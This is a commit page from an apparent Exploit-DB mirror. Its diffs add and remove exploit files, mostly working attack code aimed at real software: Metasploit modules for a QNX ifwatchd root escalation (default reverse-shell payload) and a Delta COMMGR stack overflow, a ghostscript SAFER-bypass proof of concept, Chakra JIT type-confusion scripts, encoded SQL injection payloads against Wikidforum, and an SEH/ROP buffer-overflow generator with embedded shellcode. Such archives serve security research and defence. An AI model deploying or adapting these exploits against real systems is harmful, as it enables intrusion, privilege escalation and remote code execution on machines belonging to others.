bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-10

Browse source 
15 changes to exploits/shellcodes

Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass
Microsoft Edge Chakra JIT - Type Confusion

Seqrite End Point Security 7.4 - Privilege Escalation

Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)

360 3.5.0.1033 - Sandbox Escape
ghostscript - executeonly Bypass with errorhandler Setup
ifwatchd - Privilege Escalation (Metasploit)

FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)

Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)

Wikidforum 2.20 - 'select_sort' SQL Injection

Wikidforum 2.20 - 'message_id' SQL Injection

Monstra 3.0.4 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-10-10 05:01:44 +00:00
parent b311000a22
commit 6fe17058fb
13 changed files with 636 additions and 103 deletions
exploits
linux/local
45573.txt45575.rb
php/webapps
45156.txt45564.txt45569.txt
windows
dos
45571.js45572.js
local
45540.py45568.txt
remote
45574.rb
windows_x86-64/local
45565.py
windows_x86/remote
45333.py
files_exploits.csv

56
exploits/linux/local/45573.txt Normal file
View file

@ -0,0 +1,56 @@
While documenting bug 1675, I noticed another problem with errordict in ghostscript. Full working exploit that works in the last few versions is attached, viewing it in evince, imagemagick, gimp, okular, etc should add a line to ~/.bashrc. Additionally, because nautilus will automatically invoke evince-thumbnailer without any user-interaction, just browsing a website is enough to trigger the vulnerability.
taviso@ubuntu:~$ convert exploit.jpg output.jpg
taviso@ubuntu:~$ tail -1 ~/.bashrc
echo pwned by postscript
Good news: If your distro ships gnome-desktop 3.25.90 or later and wasn't bananas enough to disable sandboxing (yes, some are really doing that, see bug 1643 ), I don't know of any way to trigger automatic exploitation. If you open the file manually, you're still in trouble though.
One of the core access control features in postscript is the ability to mark procedures executeonly, this prevents users from peeking inside system routines and getting references to powerful operators they shouldn't have access to. I have a full description of how the executeonly mechanism works in bug 1675.
Until recently you could install an error handler in errordict and if you cause an executeonly procedure to stop ("stop" is the postscript term for "throw an exception"), that would expose the faulting operator to the error handler. That is no longer possible, because errordict is ignored in the -dSAFER sandbox.
Unfortunately, the fix was incomplete, because you could still make the invocation of the errorhandler itself stop by filling up the stack with junk and making it /stackoverflow.
One way to exploit this is to find an executeonly procedure that can stop in two different ways, you trigger the first exception and then you make calling the errorhandler stop (/stackoverflow or /execoverflow will do). When that fails the operand stack is left in an inconsistent state, because ghostscript was trying to set up the errorhandler but failed.
Here is how to exploit it:
% first, fill up the stack with junk so there is only a tiny bit of room for the errorhandler
GS>0 1 300368 {} for
% We can make /switch_to_normal_marking_ops fail by making pdfopdict a non-dictionary
GS<300369>/pdfopdict null def
% call /switch_to_normal_marking_ops (which is executeonly)
GS<300369>GS_PDF_ProcSet /switch_to_normal_marking_ops get stopped
% that failed because of /typecheck writing to pdfopdict
GS<2>==
true
% And if we look at the last few elements of the saved stack...
GS<1>dup dup length 10 sub 10 getinterval ==
[300364 300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]
% The failed operator is on there ready to be passed to the errorhandler.
forceput is a very powerful operator that ignores all access controls, we can extract it from the stack, and then do whatever we like.
% Lets disable SAFER and give ourselves access to the whole filesystem (including .bashrc, ssh keys, chrome cookies, everything)
systemdict /SAFER false forceput
systemdict /userparams get /PermitFileControl [(*)] forceput
systemdict /userparams get /PermitFileWriting [(*)] forceput
systemdict /userparams get /PermitFileReading [(*)] forceput
Putting it all together, here is reading /etc/passwd just to demo:
$ ./gs -dSAFER -f test.ps
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
(root:x:0:0:root:/root:/bin/bash)
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45573.zip

118
exploits/linux/local/45575.rb Executable file
View file

@ -0,0 +1,118 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ifwatchd Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the ifwatchd suid executable.
ifwatchd allows users to specify scripts to execute using the '-A'
command line argument; however, it does not drop privileges when
executing user-supplied scripts, resulting in execution of arbitrary
commands as root.
This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
and 6.5.0 SP1 (x86).
},
'License' => MSF_LICENSE,
'Author' =>
[
'cenobyte', # Discovery and exploit
'Tim Brown', # Independent discovery
'Brendan Coles' # Metasploit
],
'References' =>
[
['CVE', '2014-2533'],
['BID', '66449'],
['EDB', '32153'],
['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
],
'DisclosureDate' => 'Mar 10 2014',
'Platform' => 'unix', # QNX
'Arch' => ARCH_CMD,
'SessionTypes' => %w(shell meterpreter),
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'Payload' =>
{
'BadChars' => '',
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'gawk generic'
}
},
'DefaultOptions' =>
{
'WfsDelay' => 10,
'PAYLOAD' => 'cmd/unix/reverse_awk'
}
))
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def ifwatchd_path
'/sbin/ifwatchd'
end
def base_dir
datastore['WritableDir']
end
def check
unless setuid? ifwatchd_path
vprint_error "#{ifwatchd_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{ifwatchd_path} is setuid"
CheckCode::Detected
end
def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
print_status 'Writing interface arrival event script...'
cmd_exec "echo '#!/bin/sh' > #{script_path}"
cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
cmd_exec "echo \"#{exp}\" >> #{script_path}"
cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
register_file_for_cleanup script_path
cmd_exec "chmod +x '#{script_path}'"
print_status "Executing #{ifwatchd_path}..."
interface = 'lo0'
cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
end
end

17
exploits/php/webapps/45156.txt
View file

@ -1,17 +0,0 @@
# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting
# Date: 2018-08-04
# Exploit Author: Nainsi Gupta
# Vendor Homepage: http://monstra.org/
# Software Link: https://github.com/monstra-cms/monstra
# Product Name: Monstra-dev
# Version: 3.0.4
# Tested on: Windows 10 (Firefox/Chrome)
# CVE : N/A
# POC
1- Go to the site ( http://server.com/monstra-dev/ ) .
2- Click on Registration page (Registration) .
3- Register by giving you name ,mail and soo on...
4- Now log In i the website.
5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "><svg/onload=alert(/Case/)> and in Lastname paste "><svg/onload=alert(/Test/)>
6- After saving the above changes, click on edit profile page and you will be able to see to Pop up stating "Test" and "Case".

54
exploits/php/webapps/45564.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Wikidforum 2.20 - 'select_sort' SQL Injection
# Date: 2018-10-08
# Exploit Author: Seccops - Siber Güvenlik Hizmetleri (https://seccops.com)
# Vendor Homepage: https://sourceforge.net/projects/wikidforum/
# Software Link: https://sourceforge.net/projects/wikidforum/files/Wikidforum-com-ed.2.20.zip/download
# Version: 2.20
# Tested on: Windows 10
# Vulnerability Type: SQL Injection
# CVE: -
# Vulnerable the POST parameter in search: select_sort
# HTTP Requests for SQLi Detection:
POST /Wikidforum-com-ed.2.20/wikidforum/index.php?action=search&mode=search HTTP/1.1
Host: localhost
Content-Length: 428
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: m_username=testuser; m_passwd=21232f297a57a5a743894a0e4a801fc3
Connection: close
txtsearch=3&opt_search_select=forum&txt_author=3&search_display_field%255b%255d=post_rate&select_sort=SQL_INJECTION
# Vulnerable the POST parameter in search: parent_post_id
# HTTP Requests for SQLi Detection:
GET /Wikidforum-com-ed.2.20/wikidforum/rpc.php?action=applications/post/rpc.php&mode=post_rpc&page=1&num_records=25&parent_post_id=SQL_INJECTION HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: m_username=testuser; m_passwd=21232f297a57a5a743894a0e4a801fc3
# Vulnerable the POST parameter in search: num_records
# HTTP Requests for SQLi Detection:
GET /Wikidforum-com-ed.2.20/wikidforum/rpc.php?action=applications/post/rpc.php&mode=post_rpc&page=1&num_records=SQL_INJECTION HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: m_username=testuser; m_passwd=21232f297a57a5a743894a0e4a801fc3

45
exploits/php/webapps/45569.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Wikidforum 2.20 - 'message_id' SQL Injection
# Exploit Author: Ihsan Sencan# Exploit Author: Ihsan Sencan
# Date: 2018-10-09
# Vendor Homepage: https://sourceforge.net/projects/wikidforum/
# Software Link: https://sourceforge.net/projects/wikidforum/files/Wikidforum-com-ed.2.20.zip/download
# Version: 2.20
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?action=member_details&id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%40%40%48%4f%53%54%4e%41%4d%45%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 2)
# http://localhost/[PATH]/index.php?action=message_details&type=sent_item&message_id=[SQL]
%28%55%50%44%41%54%45%58%4d%4c%28%31%2c%43%4f%4e%43%41%54%28%30%78%32%65%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%2c%36%36%29%29
# 3)
# http://localhost/[PATH]/index.php?action=edit_post&post_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 4)
# http://localhost/[PATH]/index.php?action=create_article&article_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%4f%55%4e%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%29%2c%30%78%32%30%32%66%32%30%34%34%36%31%37%34%36%31%36%32%36%31%37%33%36%35%37%33%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 5)
# http://localhost/[PATH]/index.php?action=pages&page_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%53%45%53%53%49%4f%4e%5f%55%53%45%52%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 6)
# http://localhost/[PATH]/index.php?action=article_main_category&cat_id=[SQL]
%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%40%40%48%41%56%45%5f%49%4e%4e%4f%44%42%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
# 7)
# http://localhost/[PATH]/admin/rpc.php?action=applications/admin/posts.php&mode=delete_post&post_id=[SQL]
%28%55%50%44%41%54%45%58%4d%4c%28%31%2c%43%4f%4e%43%41%54%28%30%78%32%65%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%2c%36%36%29%29

51
exploits/windows/dos/45571.js Normal file
View file

@ -0,0 +1,51 @@
/*
The BailOutOnInvalidatedArrayHeadSegment check uses the JavascriptArray::GetArrayForArrayOrObjectWithArray method to check whether the given object is an array. If it's not an array, it will decide to skip the check which means that no bailout will happen. The JavascriptArray::GetArrayForArrayOrObjectWithArray method determines it by comparing the vtable of the given object like the following.
if(vtable == VirtualTableInfo<JavascriptArray>::Address)
{
*arrayTypeIdRef = TypeIds_Array;
}
else if(vtable == VirtualTableInfo<JavascriptNativeIntArray>::Address)
{
*arrayTypeIdRef = TypeIds_NativeIntArray;
}
else if(vtable == VirtualTableInfo<JavascriptNativeFloatArray>::Address)
{
*arrayTypeIdRef = TypeIds_NativeFloatArray;
}
else
{
return nullptr;
}
if(!array)
{
array = FromVar(var);
}
return array;
Since wrapping an object with the CrossSite class replaces the vtable of the object, this can be used to bypass it.
PoC:
*/
function opt(x_obj, arr) {
arr[0] = 1.1;
x_obj.a = arr; // Replacing the vtable.
arr['leng' + 'th'] = 0; // The length changes, but the BailOutOnInvalidatedArrayHeadSegment check will think that it's not an array. So no bailout will happen.
arr[0] = 2.3023e-320;
}
let x_obj = document.body.appendChild(document.createElement('iframe')).contentWindow.eval('({})');
let arr = [1.1, 1.1];
for (let i = 0; i < 10000; i++) {
opt(x_obj, arr.concat());
}
opt(x_obj, arr);
arr[1] = {}; // in-place type conversion
alert(arr);

79
exploits/windows/dos/45572.js Normal file
View file

@ -0,0 +1,79 @@
/*
The switch statement only handles Js::TypeIds_Array but not Js::TypeIds_NativeIntArray and Js::TypeIds_NativeFloatArray. So for example, a native float array can be considered as of type ObjectType::Object under certain circumstances where "objValueType.IsLikelyArrayOrObjectWithArray()" is not fulfilled. As it doesn't install any array type conversion check for a definite object, handling a native array as a definite object can lead to type confusion.
void
GlobOpt::UpdateObjPtrValueType(IR::Opnd * opnd, IR::Instr * instr)
{
...
if (newValueType == ValueType::Uninitialized)
{
switch (typeId)
{
default:
if (typeId > Js::TypeIds_LastStaticType)
{
Assert(typeId != Js::TypeIds_Proxy);
if (objValueType.IsLikelyArrayOrObjectWithArray())
{
// If we have likely object with array before, we can't make it definite object with array
// since we have only proved that it is an object.
// Keep the likely array or object with array.
}
else
{
newValueType = ValueType::GetObject(ObjectType::Object);
}
}
break;
case Js::TypeIds_Array:
// Because array can change type id, we can only make it definite if we are doing array check hoist
// so that implicit call will be installed between the array checks.
if (!DoArrayCheckHoist() ||
(currentBlock->loop
? !this->ImplicitCallFlagsAllowOpts(currentBlock->loop)
: !this->ImplicitCallFlagsAllowOpts(this->func)))
{
break;
}
if (objValueType.IsLikelyArrayOrObjectWithArray())
{
// If we have likely no missing values before, keep the likely, because, we haven't proven that
// the array really has no missing values
if (!objValueType.HasNoMissingValues())
{
newValueType = ValueType::GetObject(ObjectType::Array).SetArrayTypeId(typeId);
}
}
else
{
newValueType = ValueType::GetObject(ObjectType::Array).SetArrayTypeId(typeId);
}
break;
}
}
...
}
PoC:
*/
function opt(arr, arr2) {
arr[0] = 1.1;
arr2.method(arr2[0] = {});
arr[0] = 2.3023e-320;
}
Object.prototype.method = () => {};
let arr = [1.1, 2.2];
for (let i = 0; i < 100; i++) {
opt(arr, 1); // Feeding an integer to make the value type LikelyCanBeTaggedValue_Int_PrimitiveOrObject
opt(arr, arr.concat());
}
setTimeout(() => {
opt(arr, arr);
alert(arr);
}, 100); // Waiting for the JIT server to finish its job.

29
exploits/windows/local/45540.py
View file

@ -1,29 +0,0 @@
# Exploit Title: 360 3.5.0.1033 - Sandbox Escape
# Date: 2018-10-08
# Exploit Author: vr_system
# Vendor Homepage: https://www.360.cn/
# Software Link: https://dl.360safe.com/360/inst.exe
# Version: 3.5.0.1033
# Tested on: 3.5.0.1033
# CVE : None
# 1、CMD_test.py
import os
os.system("CMD")
# 2、PowerShell_test.py
import os
os.system("PowerShell")
# 3、
# Running CMD_test.py in sandbox
Microsoft Windows [版本 10.0.17134.254]
(c) 2018 Microsoft Corporation保留所有权利
C:\Python27>
# Running PowerShell_test.py in sandbox
Windows PowerShell
版权所有 (C) Microsoft Corporation保留所有权利
PS C:\Python27>

65
exploits/windows/local/45568.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: Seqrite End Point Security 7.4 - Privilege Escalation
# Date: 2018-09-13
# Exploit Author: Hashim Jawad - @ihack4falafel
# Vendor Homepage: https://www.seqrite.com/
# Tested on: Windows 7 Enterprise SP1 (x64)
# CVE: CVE-2018-17775
# Description:
# Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite"
# with very weak folder permissions granting any user full permission "Everyone: (F)"
# to the contents of the directory and it's subfolders. In addition, the program installs handful
# of services with binaries within the program folder that run as "LocalSystem". Given
# the "Self Protection" feature (on by default) is disabled which can be done in number of ways
#(for instance, if the policy does not enforce EPS client password to change the settings any user
# can disable that feature), meaning a non-privileged user would be able to
# elevate privileges to "NT AUTHORITY\SYSTEM".
# PoC
c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
Everyone:(CI)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
c:\>sc qc "Core Mail Protection"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Core Mail Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
c:\>
# Exploit:
Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.

79
exploits/windows/remote/45574.rb Executable file
View file

@ -0,0 +1,79 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end

80
exploits/windows_x86-64/local/45565.py Executable file
View file

@ -0,0 +1,80 @@
# Exploit Title: Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-10-08
# Exploit Author: Matteo Malvica
# Vendor: Cleanersoft Software
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested Version: 2.8
# Tested on OS: Windows 7 - 64bit
# Modified SEH Exploit https://www.exploit-db.com/exploits/45412/
# CVE : N/A
#
# Steps:
# 0. Turn DEP on and reboot
# I Run the python script, it will create a new file with the name "exploit.wma".
# II Start the program and click on "Convert".
# III Load the file "exploit.wma"
# IV A shiny calculator will pop-up on your desktop
#!/usr/bin/python
import struct
# msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d\x2f' -f python
shellcode = ""
shellcode += "\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
shellcode += "\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
shellcode += "\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
shellcode += "\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
shellcode += "\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
shellcode += "\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
shellcode += "\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
shellcode += "\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
shellcode += "\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
shellcode += "\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
shellcode += "\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
shellcode += "\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
shellcode += "\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
shellcode += "\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
shellcode += "\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
shellcode += "\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
shellcode += "\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x00487219, # POP EDX # RETN [fcrip.exe]
0x004e9208, # ptr to &VirtualAlloc() [IAT fcrip.exe]
0x10007089, # MOV EAX,DWORD PTR DS:[EDX] # RETN [libFLAC.dll]
0x0040508e, # XCHG EAX,ESI # RETN [fcrip.exe]
0x004d9e5c, # POP EBP # RETN [fcrip.exe]
0x1000c5ce, # & push esp # ret [libFLAC.dll]
0x00445aff, # POP EBX # RETN [fcrip.exe]
0x00000001, # 0x00000001-> ebx
0x00494012, # POP EDX # RETN [fcrip.exe]
0x00001000, # 0x00001000-> edx
0x004c2d76, # POP ECX # RETN [fcrip.exe]
0x00000040, # 0x00000040-> ecx
0x00409aa4, # POP EDI # RETN [fcrip.exe]
0x00412557, # RETN (ROP NOP) [fcrip.exe]
0x639d1575, # POP EAX # RETN [vorbis.dll]
0x90909090, # nop
0x00493619, # PUSHAD # RETN [fcrip.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
nop_block = '\x90' * 8
total_buffer = 4444
offset = "A" * 3804
SEH = struct.pack('<L',0x639d2ad8) # 0x639d2ad8 # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [vorbis.dll] **
padding = "B" * (total_buffer - len(SEH) - len(offset))
payload = offset + nop_block + rop_chain + nop_block * 2 + shellcode + "\xCC" * 4 + SEH + padding
try:
f=open("exploit.wma","w")
print "[+] Creating %s bytes of tiramisù payload..." %len(payload)
f.write(payload)
f.close()
print "[+] High carb exploit created!"
except:
print "Dessert cannot be created"

54
exploits/windows_x86/remote/45333.py
View file

@ -1,54 +0,0 @@
# Exploit Title: FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-04
